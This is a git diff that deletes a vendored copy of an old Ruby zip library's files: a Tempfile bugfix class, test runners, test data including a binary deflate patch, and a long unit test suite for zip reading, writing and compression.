-  @@cleanlist = []
-
-  # Creates a temporary file of mode 0600 in the temporary directory
-  # whose name is basename.pid.n and opens with mode "w+".  A Tempfile
-  # object works just like a File object.
-  #
-  # If tmpdir is omitted, the temporary directory is determined by
-  # Dir::tmpdir provided by 'tmpdir.rb'.
-  # When $SAFE > 0 and the given tmpdir is tainted, it uses
-  # /tmp. (Note that ENV values are tainted by default)
-  def initialize(basename, tmpdir=Dir::tmpdir)
-    if $SAFE > 0 and tmpdir.tainted?
-      tmpdir = '/tmp'
-    end
-
-    lock = nil
-    n = failure = 0
-    
-    begin
-      Thread.critical = true
-
-      begin
-  tmpname = sprintf('%s/%s%d.%d', tmpdir, basename, $$, n)
-  lock = tmpname + '.lock'
-  n += 1
-      end while @@cleanlist.include?(tmpname) or
-  File.exist?(lock) or File.exist?(tmpname)
-
-      Dir.mkdir(lock)
-    rescue
-      failure += 1
-      retry if failure < MAX_TRY
-      raise "cannot generate tempfile `%s'" % tmpname
-    ensure
-      Thread.critical = false
-    end
-
-    @data = [tmpname]
-    @clean_proc = Tempfile.callback(@data)
-    ObjectSpace.define_finalizer(self, @clean_proc)
-
-    @tmpfile = File.open(tmpname, File::RDWR|File::CREAT|File::EXCL, 0600)
-    @tmpname = tmpname
-    @@cleanlist << @tmpname
-    @data[1] = @tmpfile
-    @data[2] = @@cleanlist
-
-    super(@tmpfile)
-
-    # Now we have all the File/IO methods defined, you must not
-    # carelessly put bare puts(), etc. after this.
-
-    Dir.rmdir(lock)
-  end
-
-  # Opens or reopens the file with mode "r+".
-  def open
-    @tmpfile.close if @tmpfile
-    @tmpfile = File.open(@tmpname, 'r+')
-    @data[1] = @tmpfile
-    __setobj__(@tmpfile)
-  end
-
-  def _close	# :nodoc:
-    @tmpfile.close if @tmpfile
-    @data[1] = @tmpfile = nil
-  end    
-  protected :_close
-
-  # Closes the file.  If the optional flag is true, unlinks the file
-  # after closing.
-  #
-  # If you don't explicitly unlink the temporary file, the removal
-  # will be delayed until the object is finalized.
-  def close(unlink_now=false)
-    if unlink_now
-      close!
-    else
-      _close
-    end
-  end
-
-  # Closes and unlinks the file.
-  def close!
-    _close
-    @clean_proc.call
-    ObjectSpace.undefine_finalizer(self)
-  end
-
-  # Unlinks the file.  On UNIX-like systems, it is often a good idea
-  # to unlink a temporary file immediately after creating and opening
-  # it, because it leaves other programs zero chance to access the
-  # file.
-  def unlink
-    # keep this order for thread safeness
-    File.unlink(@tmpname) if File.exist?(@tmpname)
-    @@cleanlist.delete(@tmpname) if @@cleanlist
-  end
-  alias delete unlink
-
-  if RUBY_VERSION > '1.8.0'
-    def __setobj__(obj)
-      @_dc_obj = obj
-    end
-  else
-    def __setobj__(obj)
-      @obj = obj
-    end
-  end
-
-  # Returns the full path name of the temporary file.
-  def path
-    @tmpname
-  end
-
-  # Returns the size of the temporary file.  As a side effect, the IO
-  # buffer is flushed before determining the size.
-  def size
-    if @tmpfile
-      @tmpfile.flush
-      @tmpfile.stat.size
-    else
-      0
-    end
-  end
-  alias length size
-
-  class << self
-    def callback(data)	# :nodoc:
-      pid = $$
-      lambda{
-  if pid == $$ 
-    path, tmpfile, cleanlist = *data
-
-    print "removing ", path, "..." if $DEBUG
-
-    tmpfile.close if tmpfile
-
-    # keep this order for thread safeness
-    File.unlink(path) if File.exist?(path)
-    cleanlist.delete(path) if cleanlist
-
-    print "done\n" if $DEBUG
-  end
-      }
-    end
-
-    # If no block is given, this is a synonym for new().
-    #
-    # If a block is given, it will be passed tempfile as an argument,
-    # and the tempfile will automatically be closed when the block
-    # terminates.  In this case, open() returns nil.
-    def open(*args)
-      tempfile = new(*args)
-
-      if block_given?
-  begin
-    yield(tempfile)
-  ensure
-    tempfile.close
-  end
-
-  nil
-      else
-  tempfile
-      end
-    end
-  end
-end
-
-end # module BugFix
-if __FILE__ == $0
-#  $DEBUG = true
-  f = Tempfile.new("foo")
-  f.print("foo\n")
-  f.close
-  f.open
-  p f.gets # => "foo\n"
-  f.close!
-end
diff --git a/lib/zip/test/alltests.rb b/lib/zip/test/alltests.rb
deleted file mode 100755
index 691349af37..0000000000
--- a/lib/zip/test/alltests.rb
+++ /dev/null
@@ -1,9 +0,0 @@
-#!/usr/bin/env ruby
-
-$VERBOSE = true
-
-require 'stdrubyexttest'
-require 'ioextrastest'
-require 'ziptest'
-require 'zipfilesystemtest'
-require 'ziprequiretest'
diff --git a/lib/zip/test/data/file1.txt b/lib/zip/test/data/file1.txt
deleted file mode 100644
index 23ea2f731b..0000000000
--- a/lib/zip/test/data/file1.txt
+++ /dev/null
@@ -1,46 +0,0 @@
-
-AUTOMAKE_OPTIONS = gnu
-
-EXTRA_DIST = test.zip
-
-CXXFLAGS= -g
-
-noinst_LIBRARIES = libzipios.a
-
-bin_PROGRAMS = test_zip test_izipfilt test_izipstream
-# test_flist 
-
-libzipios_a_SOURCES = backbuffer.h    fcol.cpp           fcol.h           \
-                      fcol_common.h   fcolexceptions.cpp fcolexceptions.h \
-                      fileentry.cpp   fileentry.h        flist.cpp        \
-                      flist.h         flistentry.cpp     flistentry.h     \
-                      flistscanner.h  ifiltstreambuf.cpp ifiltstreambuf.h \
-                      inflatefilt.cpp inflatefilt.h      izipfilt.cpp     \
-                      izipfilt.h      izipstream.cpp     izipstream.h     \
-                      zipfile.cpp     zipfile.h          ziphead.cpp      \
-                      ziphead.h       flistscanner.ll
-
-# test_flist_SOURCES = test_flist.cpp
-
-test_izipfilt_SOURCES = test_izipfilt.cpp
-
-test_izipstream_SOURCES = test_izipstream.cpp
-
-test_zip_SOURCES = test_zip.cpp
-
-# Notice that libzipios.a is not specified as -L. -lzipios
-# If it was, automake would not include it as a dependency.
-
-# test_flist_LDADD = libzipios.a
-
-test_izipfilt_LDADD = libzipios.a -lz
-
-test_zip_LDADD = libzipios.a -lz
-
-test_izipstream_LDADD = libzipios.a -lz
-
-
-
-flistscanner.cc : flistscanner.ll
-	$(LEX) -+ -PFListScanner -o$@ $^
-
diff --git a/lib/zip/test/data/file1.txt.deflatedData b/lib/zip/test/data/file1.txt.deflatedData
deleted file mode 100644
index bfbb4f42c009154e9e3304855c31813275b709d6..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 482
zcmV<80UiE@RMBpmFcf{>{fa9!51TglfJv3cnzTZrO$4cwhiS+$rdV}s6dQHj*U#Vt
z3=5f`xX0%l?mad@^t@d^Mn6{hdb5q!PZ{3gi);W^yKNff%Q)Lw#4v5bKfDIG+wJa?
z=pnns-~~V`F15*%_<I_q@v0RIzPCiKbVva9T;`i}{g6hF*~uoiyY7M8r;-aZRN5RF
zIlzrWO2M^3fZj1DdA5E|@4ENw34Pr+Wyy|Vg?5!xiICPc4y%JI5BLdqaka#ps>4Ca
zj^EboH)XZqO6tya0#)-~Treih@%_}yQ1_j5gZaJAdUeEVT>IuDsQSN`rbJ4Y7;mF@
zf!i26zX>!yBbTKhhP8Aj^y*W$=fmwAo%K2sJ)!HNmwM3k8J!jDh3C2&Q7T4?A^j^}
z9r3Ik<tGG;ZmD-K2e5qy!04(^d45VB)eU=zJS20XTWrd+kR#mSlQNt#G!-%ahlyOH
zR0eg;s6BL6Aki2kAqK)xtTZl>8+;@B3zEjD19@fmrW#RnN-n8r3f5ArlwiSXCJQF%
zdpJoZSw_p{^uI6;<pQPc#GCLs!;5T|2rxQ8O7ZJINBUv$F<I?CVelD)&3$4wGq;I>
YT71LBFMz*PQb9>fNlr&oR8>Ys3VC(y$N&HU

diff --git a/lib/zip/test/data/file2.txt b/lib/zip/test/data/file2.txt
deleted file mode 100644
index 57221d1adf..0000000000
--- a/lib/zip/test/data/file2.txt
+++ /dev/null
@@ -1,1504 +0,0 @@
-#!/usr/bin/env ruby
-
-$VERBOSE = true
-
-require 'rubyunit'
-require 'zip'
-
-include Zip
-
-Dir.chdir "test"
-
-class AbstractInputStreamTest < RUNIT::TestCase
-  # AbstractInputStream subclass that provides a read method
-  
-  TEST_LINES = [ "Hello world#{$/}", 
-    "this is the second line#{$/}", 
-    "this is the last line"]
-  TEST_STRING = TEST_LINES.join
-  class TestAbstractInputStream 
-    include AbstractInputStream
-    def initialize(aString)
-      @contents = aString
-      @readPointer = 0
-    end
-
-    def read(charsToRead)
-      retVal=@contents[@readPointer, charsToRead]
-      @readPointer+=charsToRead
-      return retVal
-    end
-
-    def produceInput
-      read(100)
-    end
-
-    def inputFinished?
-      @contents[@readPointer] == nil
-    end
-  end
-
-  def setup
-    @io = TestAbstractInputStream.new(TEST_STRING)
-  end
-  
-  def test_gets
-    assert_equals(TEST_LINES[0], @io.gets)
-    assert_equals(TEST_LINES[1], @io.gets)
-    assert_equals(TEST_LINES[2], @io.gets)
-    assert_equals(nil, @io.gets)
-  end
-
-  def test_getsMultiCharSeperator
-    assert_equals("Hell", @io.gets("ll"))
-    assert_equals("o world#{$/}this is the second l", @io.gets("d l"))
-  end
-
-  def test_each_line
-    lineNumber=0
-    @io.each_line {
-      |line|
-      assert_equals(TEST_LINES[lineNumber], line)
-      lineNumber+=1
-    }
-  end
-
-  def test_readlines
-    assert_equals(TEST_LINES, @io.readlines)
-  end
-
-  def test_readline
-    test_gets
-    begin
-      @io.readline
-      fail "EOFError expected"
-      rescue EOFError
-    end
-  end
-end
-
-class ZipEntryTest < RUNIT::TestCase
-  TEST_ZIPFILE = "someZipFile.zip"
-  TEST_COMMENT = "a comment"
-  TEST_COMPRESSED_SIZE = 1234
-  TEST_CRC = 325324
-  TEST_EXTRA = "Some data here"
-  TEST_COMPRESSIONMETHOD = ZipEntry::DEFLATED
-  TEST_NAME = "entry name"
-  TEST_SIZE = 8432
-  TEST_ISDIRECTORY = false
-
-  def test_constructorAndGetters
-    entry = ZipEntry.new(TEST_ZIPFILE,
-       TEST_NAME,
-       TEST_COMMENT,
-       TEST_EXTRA,
-       TEST_COMPRESSED_SIZE,
-       TEST_CRC,
-       TEST_COMPRESSIONMETHOD,
-       TEST_SIZE)
-
-    assert_equals(TEST_COMMENT, entry.comment)
-    assert_equals(TEST_COMPRESSED_SIZE, entry.compressedSize)
-    assert_equals(TEST_CRC, entry.crc)
-    assert_equals(TEST_EXTRA, entry.extra)
-    assert_equals(TEST_COMPRESSIONMETHOD, entry.compressionMethod)
-    assert_equals(TEST_NAME, entry.name)
-    assert_equals(TEST_SIZE, entry.size)
-    assert_equals(TEST_ISDIRECTORY, entry.isDirectory)
-  end
-
-  def test_equality
-    entry1 = ZipEntry.new("file.zip", "name",  "isNotCompared", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry2 = ZipEntry.new("file.zip", "name",  "isNotComparedXXX", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry3 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry4 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry5 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry6 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123, 
-        ZipEntry::DEFLATED, 10000)  
-    entry7 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123,  
-        ZipEntry::STORED,   10000)  
-    entry8 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123,  
-        ZipEntry::STORED,   100000)  
-
-    assert_equals(entry1, entry1)
-    assert_equals(entry1, entry2)
-
-    assert(entry2 != entry3)
-    assert(entry3 != entry4)
-    assert(entry4 != entry5)
-    assert(entry5 != entry6)
-    assert(entry6 != entry7)
-    assert(entry7 != entry8)
-
-    assert(entry7 != "hello")
-    assert(entry7 != 12)
-  end
-end
-
-module IOizeString
-  attr_reader :tell
-  
-  def read(count = nil)
-    @tell ||= 0
-    count = size unless count
-    retVal = slice(@tell, count)
-    @tell += count
-    return retVal
-  end
-
-  def seek(index, offset)
-    @tell ||= 0
-    case offset
-    when IO::SEEK_END
-      newPos = size + index
-    when IO::SEEK_SET
-      newPos = index
-    when IO::SEEK_CUR
-      newPos = @tell + index
-    else
-      raise "Error in test method IOizeString::seek"
-    end
-    if (newPos < 0 || newPos >= size)
-      raise Errno::EINVAL
-    else
-      @tell=newPos
-    end
-  end
-
-  def reset
-    @tell = 0
-  end
-end
-
-class ZipLocalEntryTest < RUNIT::TestCase
-  def test_readLocalEntryHeaderOfFirstTestZipEntry
-    File.open(TestZipFile::TEST_ZIP3.zipName) {
-      |file|
-      entry = ZipEntry.readLocalEntry(file)
-      
-      assert_equal("", entry.comment)
-      # Differs from windows and unix because of CR LF
-      # assert_equal(480, entry.compressedSize)
-      # assert_equal(0x2a27930f, entry.crc)
-      # extra field is 21 bytes long
-      # probably contains some unix attrutes or something
-      # disabled: assert_equal(nil, entry.extra)
-      assert_equal(ZipEntry::DEFLATED, entry.compressionMethod)
-      assert_equal(TestZipFile::TEST_ZIP3.entryNames[0], entry.name)
-      assert_equal(File.size(TestZipFile::TEST_ZIP3.entryNames[0]), entry.size)
-      assert(! entry.isDirectory)
-    }
-  end
-
-  def test_readLocalEntryFromNonZipFile
-    File.open("ziptest.rb") {
-      |file|
-      assert_equals(nil, ZipEntry.readLocalEntry(file))
-    }
-  end
-
-  def test_readLocalEntryFromTruncatedZipFile
-    zipFragment=""
-    File.open(TestZipFile::TEST_ZIP2.zipName) { |f| zipFragment = f.read(12) } # local header is at least 30 bytes
-    zipFragment.extend(IOizeString).reset
-    entry = ZipEntry.new
-    entry.readLocalEntry(zipFragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-  def test_writeEntry
-    entry = ZipEntry.new("file.zip", "entryName", "my little comment", 
-       "thisIsSomeExtraInformation", 100, 987654, 
-       ZipEntry::DEFLATED, 400)
-    writeToFile("localEntryHeader.bin", "centralEntryHeader.bin",  entry)
-    entryReadLocal, entryReadCentral = readFromFile("localEntryHeader.bin", "centralEntryHeader.bin")
-    compareLocalEntryHeaders(entry, entryReadLocal)
-    compareCDirEntryHeaders(entry, entryReadCentral)
-  end
-  
-  private
-  def compareLocalEntryHeaders(entry1, entry2)
-    assert_equals(entry1.compressedSize   , entry2.compressedSize)
-    assert_equals(entry1.crc              , entry2.crc)
-    assert_equals(entry1.extra            , entry2.extra)
-    assert_equals(entry1.compressionMethod, entry2.compressionMethod)
-    assert_equals(entry1.name             , entry2.name)
-    assert_equals(entry1.size             , entry2.size)
-    assert_equals(entry1.localHeaderOffset, entry2.localHeaderOffset)
-  end
-
-  def compareCDirEntryHeaders(entry1, entry2)
-    compareLocalEntryHeaders(entry1, entry2)
-    assert_equals(entry1.comment, entry2.comment)
-  end
-
-  def writeToFile(localFileName, centralFileName, entry)
-    File.open(localFileName,   "wb") { |f| entry.writeLocalEntry(f) }
-    File.open(centralFileName, "wb") { |f| entry.writeCDirEntry(f)  }
-  end
-
-  def readFromFile(localFileName, centralFileName)
-    localEntry = nil
-    cdirEntry  = nil
-    File.open(localFileName,   "rb") { |f| localEntry = ZipEntry.readLocalEntry(f) }
-    File.open(centralFileName, "rb") { |f| cdirEntry  = ZipEntry.readCDirEntry(f) }
-    return [localEntry, cdirEntry]
-  end
-end
-
-
-module DecompressorTests
-  # expects @refText and @decompressor
-
-  def test_readEverything
-    assert_equals(@refText, @decompressor.read)
-  end
-    
-  def test_readInChunks
-    chunkSize = 5
-    while (decompressedChunk = @decompressor.read(chunkSize))
-      assert_equals(@refText.slice!(0, chunkSize), decompressedChunk)
-    end
-    assert_equals(0, @refText.size)
-  end
-end
-
-class InflaterTest < RUNIT::TestCase
-  include DecompressorTests
-
-  def setup
-    @file = File.new("file1.txt.deflatedData", "rb")
-    @refText=""
-    File.open("file1.txt") { |f| @refText = f.read }
-    @decompressor = Inflater.new(@file)
-  end
-
-  def teardown
-    @file.close
-  end
-end
-
-
-class PassThruDecompressorTest < RUNIT::TestCase
-  include DecompressorTests
-  TEST_FILE="file1.txt"
-  def setup
-    @file = File.new(TEST_FILE)
-    @refText=""
-    File.open(TEST_FILE) { |f| @refText = f.read }
-    @decompressor = PassThruDecompressor.new(@file, File.size(TEST_FILE))
-  end
-
-  def teardown
-    @file.close
-  end
-end
-
- 
-module AssertEntry
-  def assertNextEntry(filename, zis)
-    assertEntry(filename, zis, zis.getNextEntry.name)
-  end
-
-  def assertEntry(filename, zis, entryName)
-    assert_equals(filename, entryName)
-    assertEntryContentsForStream(filename, zis, entryName)
-  end
-
-  def assertEntryContentsForStream(filename, zis, entryName)
-    File.open(filename, "rb") {
-      |file|
-      expected = file.read
-      actual   = zis.read
-      if (expected != actual)
-  if (expected.length > 400 || actual.length > 400)
-    zipEntryFilename=entryName+".zipEntry"
-    File.open(zipEntryFilename, "wb") { |file| file << actual }
-    fail("File '#{filename}' is different from '#{zipEntryFilename}'")
-  else
-    assert_equals(expected, actual)
-  end
-      end
-    }
-  end
-
-  def AssertEntry.assertContents(filename, aString)
-    fileContents = ""
-    File.open(filename, "rb") { |f| fileContents = f.read }
-    if (fileContents != aString)
-      if (expected.length > 400 || actual.length > 400)
-  stringFile = filename + ".other"
-  File.open(stringFile, "wb") { |f| f << aString }
-  fail("File '#{filename}' is different from contents of string stored in '#{stringFile}'")
-      else
-  assert_equals(expected, actual)
-      end
-    end
-  end
-
-  def assertStreamContents(zis, testZipFile)
-    assert(zis != nil)
-    testZipFile.entryNames.each {
-      |entryName|
-      assertNextEntry(entryName, zis)
-    }
-    assert_equals(nil, zis.getNextEntry)
-  end
-
-  def assertTestZipContents(testZipFile)
-    ZipInputStream.open(testZipFile.zipName) {
-      |zis|
-      assertStreamContents(zis, testZipFile)
-    }
-  end
-
-  def assertEntryContents(zipFile, entryName, filename = entryName.to_s)
-    zis = zipFile.getInputStream(entryName)
-    assertEntryContentsForStream(filename, zis, entryName)
-  ensure 
-    zis.close if zis
-  end
-end
-
-
-
-class ZipInputStreamTest < RUNIT::TestCase
-  include AssertEntry
-
-  def test_new
-    zis = ZipInputStream.new(TestZipFile::TEST_ZIP2.zipName)
-    assertStreamContents(zis, TestZipFile::TEST_ZIP2)
-    zis.close    
-  end
-
-  def test_openWithBlock
-    ZipInputStream.open(TestZipFile::TEST_ZIP2.zipName) {
-      |zis|
-      assertStreamContents(zis, TestZipFile::TEST_ZIP2)
-    }
-  end
-
-  def test_openWithoutBlock
-    zis = ZipInputStream.open(TestZipFile::TEST_ZIP2.zipName)
-    assertStreamContents(zis, TestZipFile::TEST_ZIP2)
-  end
-
-  def test_incompleteReads
-    ZipInputStream.open(TestZipFile::TEST_ZIP2.zipName) {
-      |zis|
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[0], entry.name)
-      assert zis.gets.length > 0
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[1], entry.name)
-      assert_equals(0, entry.size)
-      assert_equals(nil, zis.gets)
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[2], entry.name)
-      assert zis.gets.length > 0
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[3], entry.name)
-      assert zis.gets.length > 0
-    }
-  end
-  
-end
-
-class TestFiles
-  RANDOM_ASCII_FILE1  = "randomAscii1.txt"
-  RANDOM_ASCII_FILE2  = "randomAscii2.txt"
-  RANDOM_ASCII_FILE3  = "randomAscii3.txt"
-  RANDOM_BINARY_FILE1 = "randomBinary1.bin"
-  RANDOM_BINARY_FILE2 = "randomBinary2.bin"
-
-  EMPTY_TEST_DIR      = "emptytestdir"
-
-  ASCII_TEST_FILES  = [ RANDOM_ASCII_FILE1, RANDOM_ASCII_FILE2, RANDOM_ASCII_FILE3 ] 
-  BINARY_TEST_FILES = [ RANDOM_BINARY_FILE1, RANDOM_BINARY_FILE2 ]
-  TEST_DIRECTORIES  = [ EMPTY_TEST_DIR ]
-  TEST_FILES        = [ ASCII_TEST_FILES, BINARY_TEST_FILES, EMPTY_TEST_DIR ].flatten!
-
-  def TestFiles.createTestFiles(recreate)
-    if (recreate || 
-  ! (TEST_FILES.inject(true) { |accum, element| accum && File.exists?(element) }))
-      
-      ASCII_TEST_FILES.each_with_index { 
-  |filename, index| 
-  createRandomAscii(filename, 1E4 * (index+1))
-      }
-      
-      BINARY_TEST_FILES.each_with_index { 
-  |filename, index| 
-  createRandomBinary(filename, 1E4 * (index+1))
-      }
-
-      ensureDir(EMPTY_TEST_DIR)
-    end
-  end
-
-  private
-  def TestFiles.createRandomAscii(filename, size)
-    File.open(filename, "wb") {
-      |file|
-      while (file.tell < size)
-  file << rand
-      end
-    }
-  end
-
-  def TestFiles.createRandomBinary(filename, size)
-    File.open(filename, "wb") {
-      |file|
-      while (file.tell < size)
-  file << rand.to_a.pack("V")
-      end
-    }
-  end
-
-  def TestFiles.ensureDir(name) 
-    if File.exists?(name)
-      return if File.stat(name).directory?
-      File.delete(name)
-    end
-    Dir.mkdir(name)
-  end
-
-end
-
-# For representation and creation of
-# test data
-class TestZipFile
-  attr_accessor :zipName, :entryNames, :comment
-
-  def initialize(zipName, entryNames, comment = "")
-    @zipName=zipName
-    @entryNames=entryNames
-    @comment = comment
-  end
-
-  def TestZipFile.createTestZips(recreate)
-    files = Dir.entries(".")
-    if (recreate || 
-      ! (files.index(TEST_ZIP1.zipName) &&
-         files.index(TEST_ZIP2.zipName) &&
-         files.index(TEST_ZIP3.zipName) &&
-         files.index(TEST_ZIP4.zipName) &&
-         files.index("empty.txt")      &&
-         files.index("short.txt")      &&
-         files.index("longAscii.txt")  &&
-         files.index("longBinary.bin") ))
-      raise "failed to create test zip '#{TEST_ZIP1.zipName}'" unless 
-  system("zip #{TEST_ZIP1.zipName} ziptest.rb")
-      raise "failed to remove entry from '#{TEST_ZIP1.zipName}'" unless 
-  system("zip #{TEST_ZIP1.zipName} -d ziptest.rb")
-      
-      File.open("empty.txt", "w") {}
-      
-      File.open("short.txt", "w") { |file| file << "ABCDEF" }
-      ziptestTxt=""
-      File.open("ziptest.rb") { |file| ziptestTxt=file.read }
-      File.open("longAscii.txt", "w") {
-  |file|
-  while (file.tell < 1E5)
-    file << ziptestTxt
-  end
-      }
-      
-      testBinaryPattern=""
-      File.open("empty.zip") { |file| testBinaryPattern=file.read }
-      testBinaryPattern *= 4
-      
-      File.open("longBinary.bin", "wb") {
-  |file|
-  while (file.tell < 3E5)
-    file << testBinaryPattern << rand
-  end
-      }
-      raise "failed to create test zip '#{TEST_ZIP2.zipName}'" unless 
-  system("zip #{TEST_ZIP2.zipName} #{TEST_ZIP2.entryNames.join(' ')}")
-
-      # without bash system interprets everything after echo as parameters to
-      # echo including | zip -z ...
-      raise "failed to add comment to test zip '#{TEST_ZIP2.zipName}'" unless 
-  system("bash -c \"echo #{TEST_ZIP2.comment} | zip -z #{TEST_ZIP2.zipName}\"")
-
-      raise "failed to create test zip '#{TEST_ZIP3.zipName}'" unless 
-  system("zip #{TEST_ZIP3.zipName} #{TEST_ZIP3.entryNames.join(' ')}")
-
-      raise "failed to create test zip '#{TEST_ZIP4.zipName}'" unless 
-  system("zip #{TEST_ZIP4.zipName} #{TEST_ZIP4.entryNames.join(' ')}")
-    end
-  rescue 
-    raise $!.to_s + 
-      "\n\nziptest.rb requires the Info-ZIP program 'zip' in the path\n" +
-      "to create test data. If you don't have it you can download\n"   +
-      "the necessary test files at http://sf.net/projects/rubyzip."
-  end
-
-  TEST_ZIP1 = TestZipFile.new("empty.zip", [])
-  TEST_ZIP2 = TestZipFile.new("4entry.zip", %w{ longAscii.txt empty.txt short.txt longBinary.bin}, 
-            "my zip comment")
-  TEST_ZIP3 = TestZipFile.new("test1.zip", %w{ file1.txt })
-  TEST_ZIP4 = TestZipFile.new("zipWithDir.zip", [ "file1.txt", 
-        TestFiles::EMPTY_TEST_DIR])
-end
-
-
-class AbstractOutputStreamTest < RUNIT::TestCase
-  class TestOutputStream
-    include AbstractOutputStream
-
-    attr_accessor :buffer
-
-    def initialize
-      @buffer = ""
-    end
-
-    def << (data)
-      @buffer << data
-      self
-    end
-  end
-
-  def setup
-    @outputStream = TestOutputStream.new
-
-    @origCommaSep = $,
-    @origOutputSep = $\
-  end
-
-  def teardown
-    $, = @origCommaSep
-    $\ = @origOutputSep
-  end
-
-  def test_write
-    count = @outputStream.write("a little string")
-    assert_equals("a little string", @outputStream.buffer)
-    assert_equals("a little string".length, count)
-
-    count = @outputStream.write(". a little more")
-    assert_equals("a little string. a little more", @outputStream.buffer)
-    assert_equals(". a little more".length, count)
-  end
-  
-  def test_print
-    $\ = nil # record separator set to nil
-    @outputStream.print("hello")
-    assert_equals("hello", @outputStream.buffer)
-
-    @outputStream.print(" world.")
-    assert_equals("hello world.", @outputStream.buffer)
-    
-    @outputStream.print(" You ok ",  "out ", "there?")
-    assert_equals("hello world. You ok out there?", @outputStream.buffer)
-
-    $\ = "\n"
-    @outputStream.print
-    assert_equals("hello world. You ok out there?\n", @outputStream.buffer)
-
-    @outputStream.print("I sure hope so!")
-    assert_equals("hello world. You ok out there?\nI sure hope so!\n", @outputStream.buffer)
-
-    $, = "X"
-    @outputStream.buffer = ""
-    @outputStream.print("monkey", "duck", "zebra")
-    assert_equals("monkeyXduckXzebra\n", @outputStream.buffer)
-
-    $\ = nil
-    @outputStream.buffer = ""
-    @outputStream.print(20)
-    assert_equals("20", @outputStream.buffer)
-  end
-  
-  def test_printf
-    @outputStream.printf("%d %04x", 123, 123) 
-    assert_equals("123 007b", @outputStream.buffer)
-  end
-  
-  def test_putc
-    @outputStream.putc("A")
-    assert_equals("A", @outputStream.buffer)
-    @outputStream.putc(65)
-    assert_equals("AA", @outputStream.buffer)
-  end
-
-  def test_puts
-    @outputStream.puts
-    assert_equals("\n", @outputStream.buffer)
-
-    @outputStream.puts("hello", "world")
-    assert_equals("\nhello\nworld\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts("hello\n", "world\n")
-    assert_equals("hello\nworld\n", @outputStream.buffer)
-    
-    @outputStream.buffer = ""
-    @outputStream.puts(["hello\n", "world\n"])
-    assert_equals("hello\nworld\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts(["hello\n", "world\n"], "bingo")
-    assert_equals("hello\nworld\nbingo\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts(16, 20, 50, "hello")
-    assert_equals("16\n20\n50\nhello\n", @outputStream.buffer)
-  end
-end
-
-
-module CrcTest
-  def runCrcTest(compressorClass)
-    str = "Here's a nice little text to compute the crc for! Ho hum, it is nice nice nice nice indeed."
-    fakeOut = AbstractOutputStreamTest::TestOutputStream.new
-    
-    deflater = compressorClass.new(fakeOut)
-    deflater << str
-    assert_equals(0x919920fc, deflater.crc)
-  end
-end
-
-
-
-class PassThruCompressorTest < RUNIT::TestCase
-  include CrcTest
-
-  def test_size
-    File.open("dummy.txt", "wb") {
-      |file|
-      compressor = PassThruCompressor.new(file)
-      
-      assert_equals(0, compressor.size)
-      
-      t1 = "hello world"
-      t2 = ""
-      t3 = "bingo"
-      
-      compressor << t1
-      assert_equals(compressor.size, t1.size)
-      
-      compressor << t2
-      assert_equals(compressor.size, t1.size + t2.size)
-      
-      compressor << t3
-      assert_equals(compressor.size, t1.size + t2.size + t3.size)
-    }
-  end
-
-  def test_crc
-    runCrcTest(PassThruCompressor)
-  end
-end
-
-class DeflaterTest < RUNIT::TestCase
-  include CrcTest
-
-  def test_outputOperator
-    txt = loadFile("ziptest.rb")
-    deflate(txt, "deflatertest.bin")
-    inflatedTxt = inflate("deflatertest.bin")
-    assert_equals(txt, inflatedTxt)
-  end
-
-  private
-  def loadFile(fileName)
-    txt = nil
-    File.open(fileName, "rb") { |f| txt = f.read }
-  end
-
-  def deflate(data, fileName)
-    File.open(fileName, "wb") {
-      |file|
-      deflater = Deflater.new(file)
-      deflater << data
-      deflater.finish
-      assert_equals(deflater.size, data.size)
-      file << "trailing data for zlib with -MAX_WBITS"
-    }
-  end
-
-  def inflate(fileName)
-    txt = nil
-    File.open(fileName, "rb") {
-      |file|
-      inflater = Inflater.new(file)
-      txt = inflater.read
-    }
-  end
-
-  def test_crc
-    runCrcTest(Deflater)
-  end
-end
-
-class ZipOutputStreamTest < RUNIT::TestCase
-  include AssertEntry
-
-  TEST_ZIP = TestZipFile::TEST_ZIP2.clone
-  TEST_ZIP.zipName = "output.zip"
-
-  def test_new
-    zos = ZipOutputStream.new(TEST_ZIP.zipName)
-    zos.comment = TEST_ZIP.comment
-    writeTestZip(zos)
-    zos.close
-    assertTestZipContents(TEST_ZIP)
-  end
-
-  def test_open
-    ZipOutputStream.open(TEST_ZIP.zipName) {
-      |zos|
-      zos.comment = TEST_ZIP.comment
-      writeTestZip(zos)
-    }
-    assertTestZipContents(TEST_ZIP)
-  end
-
-  def test_writingToClosedStream
-    assertIOErrorInClosedStream { |zos| zos << "hello world" }
-    assertIOErrorInClosedStream { |zos| zos.puts "hello world" }
-    assertIOErrorInClosedStream { |zos| zos.write "hello world" }
-  end
-
-  def test_cannotOpenFile
-    name = TestFiles::EMPTY_TEST_DIR
-    begin
-      zos = ZipOutputStream.open(name)
-    rescue Exception
-      assert($!.kind_of?(Errno::EISDIR) || # Linux 
-       $!.kind_of?(Errno::EEXIST) || # Windows/cygwin
-       $!.kind_of?(Errno::EACCES),   # Windows
-        "Expected Errno::EISDIR (or on win/cygwin: Errno::EEXIST), but was: #{$!.type}")
-    end
-  end
-
